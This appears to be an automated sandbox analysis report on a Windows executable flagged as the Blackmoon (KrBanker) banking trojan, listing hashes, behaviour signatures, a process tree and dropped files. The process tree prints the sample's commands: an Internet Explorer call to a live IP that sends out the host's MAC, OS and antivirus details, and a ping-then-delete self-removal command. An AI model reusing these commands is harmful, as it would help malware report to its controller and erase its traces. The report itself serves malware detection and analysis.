Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2024 16:57

General

  • Target

    9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe

  • Size

    34KB

  • MD5

    e57f3af1e46055845b6f67820c584011

  • SHA1

    72fa64e73df5148dea2fb5b06c63e87f79ca4deb

  • SHA256

    9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a

  • SHA512

    6fc310e83ad0aad281e93e3ca987f0dcb878d82db42f2995e9fad685ce2ec93f79a98bd7ed05b3d4da3ef00c4f35708a83aa04901e2d1c523ad818d1a96345d2

  • SSDEEP

    768:gxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMlC:RQftW0QGq/aabWrTsGx3P6Cbt7

Malware Config

Signatures

  • Blackmoon family
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 1 IoCs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe
    "C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=150CAB8245C25A1390B553037F111CBD&os=Windows 7&avs=unknow&ps=NO.&ver=jack
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1004 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2488
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\9f33cff08e3cd003014617ef7607b5e800ff2bb200b3490334e5d9eefb3a351a.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2916
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 3
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fb0aa11782d705b985b6362303ad9222

    SHA1

    014da277259faeb85b0cb64facb8414173bd3597

    SHA256

    69350f299fa977213b07cde8ceb0a5bd87e4d08e371c6d5433a327f096048e02

    SHA512

    63164b8b6235ce2a973d392d75b8a458e3c7625749fa0a48da4441db65fed0b5deadf85195d7cd135de70577722111e8f9dece32e553b02b2f2f4041fbadfdf8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    48d493904b94cecce375ee912cdc2acc

    SHA1

    8637a0f90d837d34fb0ab015ab35565057ac8d3c

    SHA256

    cdf3170435499a04345769e707ee199c6f27f8192b2ae3a1d6bd9556d285e5c4

    SHA512

    f7d44796189290c4184df6f040d16cdb7ae4126a59c1b4b401417908a27a04971e57e57aeab402e562fb84eae4d2a0b1276ce099fcbbd5fb5dc382d7102248a5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    750d56927ec528c9caca1746c5f14e88

    SHA1

    2ca61b661f1c266f32eeed961ad63cc93168808b

    SHA256

    98ae3caf1b30a3e8e711345a44303cb0ba8aec3e95f5fd1c4dc476f1f50c54d2

    SHA512

    bb01276cdbd00c6d475c4dd4d369fa4fb8ea570124c7bb4e22e18778bb5e035b398dc5308cd09e61b894a83c4e12fe5c3ab3ee95525c3d3d9a5ceb0d8340c3c0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5b9322aad221339b986476c3f496bc9a

    SHA1

    6a662668b0f3057aaea31a6b5d15ff5254b63bd0

    SHA256

    370f7008e7b476d1bf7a6ec5903b73cdde16d8f6592619d4e1bd60c2526393f5

    SHA512

    ef74b6b0f5e40e20a2e02d4b006986a60eba8b7d7d75346eb10c366cd5cbdd17ca7fe90d903307bb75afd9e02559d6e782bd7817e6c702ae4dffb9236b8c85a4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ae7b7e90fd1fee5d18f0eca2e8b4c14b

    SHA1

    1772390315901c00babf1ed211a2533e2b0eb0a9

    SHA256

    ebf6368308149ac66b843c85f934b1ca07edb0e3b481b23ae2dc348d229fe969

    SHA512

    6e14221e800d8328e6a4d1c08ecf68a05879e31b87e116e5688bfc44da1905c571ec30b71fcc278616218659bf4b6d56eb4cc5054663f0e404f620ad0bc4c76e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    cd4baea3e2ec52cbd4e916f3eb08d18c

    SHA1

    5b3f2f6de155ab8c4ff9adab50783c3daae54008

    SHA256

    62e91bbfa9f02c5ab3363dd3fde720a6014b275e47283d3d4a399c8c8c2fb980

    SHA512

    5dfc8fb472ac759edd8c21094c5d69bcded0fdf161a316405f10c6eecaa8ccf1cb141d0bf6e101c809a1f6a10fe38a6721fff7180a81f9a82b2187d4b18b5a92

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1e7fa1416c18a981f094b29da9bd9363

    SHA1

    ae143e1d6055926fb1217624a3ebd01857d1bd1e

    SHA256

    27813eafc0c05198c99d64ef6ba3f4655c4c36cdbe1b75a9a2e49cf70a16bb35

    SHA512

    0627a43c6f18915c8f768e9e5b968503863ebc5ac7e186673f7bceedbc3321966ba9d14e98999fee6f3f15b8ac6e90d130bc8dee61b21d6798d291f9091142d4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b9d4fa4090a4aef5de1bc0b034034278

    SHA1

    2b3e88ba07ed9aaccd991d10ea677407f1bfb6a0

    SHA256

    cc8e60c2fa3712783d5ad61ab5f3e4735d1c56f81aaf6abdb514f24d00b23510

    SHA512

    fb1ea1040134a1ab7059796b037d8fe82ecdbd7bf44f3c35f091a04cfde5006f586fda24047776e27085c86fa91692f0422108065f9d45a1292cbe5adb0a5869

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b32e0b6fcefae647524bc98dc4da260f

    SHA1

    9f9d6af6caab530217e5f3a6aaae6c54142f5c92

    SHA256

    60ad34921c194698a135797d2663cdb31e4432a5343d25e6e71e9ebfd57caac3

    SHA512

    72430211b9941fa020d061c283e0f37a16447f41b60e4f1ce350ed13a47263b199508decc3865dae63ce3eed28827ff4b52057fb2fee3c95066302414cd86e41

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3d0abdba05b9c911e7c049cf239d7298

    SHA1

    36fdde9596eec59fe5c05ca2552e01680b5cbffc

    SHA256

    e76271c884e253e3f5a4bd396c07f2abed15352c25a91fb79928e183ec79b661

    SHA512

    4e755d0b5844f4259456cef78adbec7d816179e20ff44ae1826ddf2a2e1b3046d7ecf08fee9679cd2079b96f7cf020730c98be0efaf96853b4a71f6540cf816c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    769ab2e743abecec6dae3af76b3cf0f0

    SHA1

    94b395eb91f0caf389e8327c3553dda8405a993a

    SHA256

    c230ee08f26abe1f28632a47f2e9b37c0c9064ff3f49cf068fd3fc58ed05eba6

    SHA512

    97003b7e17ce0dde63724ba4b5bbae4dec12926aab119a017897fa29b7f5bca463f3f6b49ad3d2b8ecb0952cd9cd97f4bf82e30c6fb55ed3b5093318b5cc3f0d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    698d3e89a0e42250a865deff83b5ba1c

    SHA1

    499b2685c75bffb14be00099dbf7e8493a6dfe9d

    SHA256

    78f55180b57a58e77a7e2c9ddfb8c351c37ff7af8cdef7044046291f6d4ee989

    SHA512

    ce46985b3c74b80af13e6e826db0d19ce86cd55272241aa09f18e9a039064d925d775bf50828891b752ca3889d6f6f41ed3809a5c7e1d64aa31a4651a01205f3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    f9276e892f7e197b08699f933c203ac8

    SHA1

    ebd71e38ac20fa2dc346fd4cc592b48a2d6f6a35

    SHA256

    118f79e572ec81a4e5b9f6cb0fa7055043607d35c1d9d30a9cc1011cd3c244b5

    SHA512

    daa11365e8df9f0ce1acdc47a95e5e5f24f547df9090975cf4acbed5a554ba0ce6222a4de6c9f1725acc9111a7c2abfcf20bfa11d811f952ba66978aa45d6b33

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7776b83f4ae62180d0e77f97861f192d

    SHA1

    35b05ccc214a67728a530a8ab421296347ea9fdf

    SHA256

    647e23ad65b4fb22a7276260c1646b3f8e2bccee82ad6b46dce83049d765f45d

    SHA512

    dceb78c5c1f158c54eaac74084062e049ae011f1e576434ef55859b0549ffbfc2b50c0478cab5ee5022281990bdcfb7933a9018f8a6f958bce044875f419f8fc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1c58e7f850b16f4853521800bf468c13

    SHA1

    8f2cf7ba2ed5d1a1a4db8a25f9347193ad395ae9

    SHA256

    58928ef42e3b95d16ba981cd2f477c3a3dfb16413ded08c8ba96ba3b61461e2d

    SHA512

    bc486bffdd370be85c27e6915c87c24e0481d48a633ee13996bfda90a5698fc213bb54c97971556066a64e8c08399d48bfbf3502f91c109d0d3a8906c0219ac0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b579ebd0e4ca08a6ad7b6fbf4f88d107

    SHA1

    13518ee5e7b420ab24afbb56d3bf7714ec9da96b

    SHA256

    e052213c8ccde8caad046e531c915148afd62afb02d929c84dbaa46b40e9009a

    SHA512

    8cb3f9f41a371568ccc336f676f3259616a6969192defa27e8797485778b2581d2381d53705db6bbdc26c5905fafe808324f62beb2cd5d6cbbb7d7768548884d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    84124ecc64b13cb50846a2e90a12b60f

    SHA1

    06357ffbb767021f99a11c18002f5d4a890e8ce1

    SHA256

    9175421e7de5e801306998c037851eeca98279330d8f90fdad56dcf2bebfb27d

    SHA512

    838bd5912361ac30192e7cf489ffa865787bc798efc957f3740aadee01f898d01d58fb2cc342e42fa75389582dbc444935b97a8aca69a55bf0fdba9a3ea4899b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    75c399b8c9de7941bca52ffab3186540

    SHA1

    08d485ffef7368861eeb1ac75062f3e8e33fc10d

    SHA256

    4e759a7ce7dda5559a7f73ce28e083e860583cd862c803a02683cd3e39e5b744

    SHA512

    3a1f61d16ca11283db6255bc6329b9a7f5cb4b9cd0a92a428ca2f2ef1dc560e27b345b257391042589b52ad27559135b316b32d2ad6e6c363cd09e8d64e1fd8a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c068db15e821908c5f9b623a452fdab5

    SHA1

    a6ac65a342a7f4cabc56bee15b4cc2b99ccc2153

    SHA256

    3a9a8241d736d143e2e9db9384247498753c22c2bdbae6e090b8f931630f8a9b

    SHA512

    92c7510b0907e9ef49a57c51f7dc5da55ace916f778ae699bfe4064b602916b190323bd0c1af79bc5ff8cadebb11e17b65183e6c5c8410785b87c22c747bb8c6

  • C:\Users\Admin\AppData\Local\Temp\Cab476F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar47D0.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/1620-2-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB

  • memory/1620-0-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB